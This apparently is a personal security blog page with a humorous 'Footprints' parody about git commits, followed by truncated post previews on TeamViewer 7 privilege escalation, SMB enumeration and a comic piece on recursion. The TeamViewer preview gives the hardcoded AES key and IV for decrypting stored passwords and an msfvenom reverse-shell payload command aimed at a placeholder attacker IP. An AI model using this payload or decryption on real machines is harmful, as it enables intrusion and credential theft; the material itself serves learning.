The Commits in the Sandbox

One night I dreamed a dream.
I had started early on the networking assignment with my partner.
Across the dark VM terminal flashed commits from my fork.
For each fork, I noticed two sets of commits in the repo,
One belonging to me and one to my partner.

After the last commit of my life flashed before me,
I feel into a very deep chemically induced sleep.
After being released from the hospital two weeks later,
I looked back at the commits in the repo.
I noticed that there was only one set of commits.

I walked in a daze to the computer lab
to find my partner
finishing up his machine learning assignment.
Suddenly, he looked up at me and blinked.

A tear came to my eye.

“My precious partner,” he said as he put his pencil down. "You are my group member and I would never leave you, even during our most difficult ARP tests.”

My jaw dropped.

“…Did you really code an entire router by yourself!?” I exclaimed.

He smiled.

“No, you were with me. For when you saw only one set of commits, it was then that I carried you.”

~

Comments

TeamViewer 7 Privilege Escalation

Hello! Today was a good day. I learned how to exploit a privesc vulnerability in TeamViewer (version 7) which had eluded me for quite some time due to a lack of user-friendly resources available online. But today I am changing all that ;) So basically, TeamViewer 7 stores user passwords encrypted with AES-128-CBC with a key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. This means that someone can decrypt that password using that key and iv and use it elsewhere if the user in question made repeated use of their password (as users often do!) Now, the process is doing this manually is complicated but luckily for us, a Metasploit module exists to automate this for us! First. generate a payload with msfvenom like so: $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip attacker> LPORT=4444 -f exe > revshell.exe Then move the payload to the machine with PowerShell (remember to move to the file to the ...

All About SMB

The first step of enumerating networks is to identify common network services. These are Telnet, SMB and FTP. First step of enumeration is to conduct a port scan using nmap. A good tool to use to enumerate networks is enum4linux. What is SMB? SMB - Server Message Block Protocol - is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. [ source ] Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers. The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX. How does SMB work? Once they have establ...

Recursion

“So, what’s your number?” he asked me with innocent eyes, contemplating a number low enough to render me virtuous but high enough to guarantee some skill. In other words, n - 1. I sighed and looked at ceiling. The scene was all too familiar. This time however, I wasn’t with a graduate student. Or an engineer. I was with a DJ. “One time, I wrote a C program to remove the voice from a sound file,” I said shyly as he leaned in and grazed my earlobe. Suddenly, he pulled back with disappointment. “I’m really sorry, but I have to go to my show,” he said as he stuffed his headphones into his backpack. “I’ll see you later.” The door slammed in the distance. I sighed and hung my head in shame. For I was embarking on the same destructive behavior, watching helplessly as my actions iterated miserably in a never-ending loop. Like recursion, a new romance temps with the promise of a memory address, such as the $user = “girlfriend” string as...

My Security Diary

Search This Blog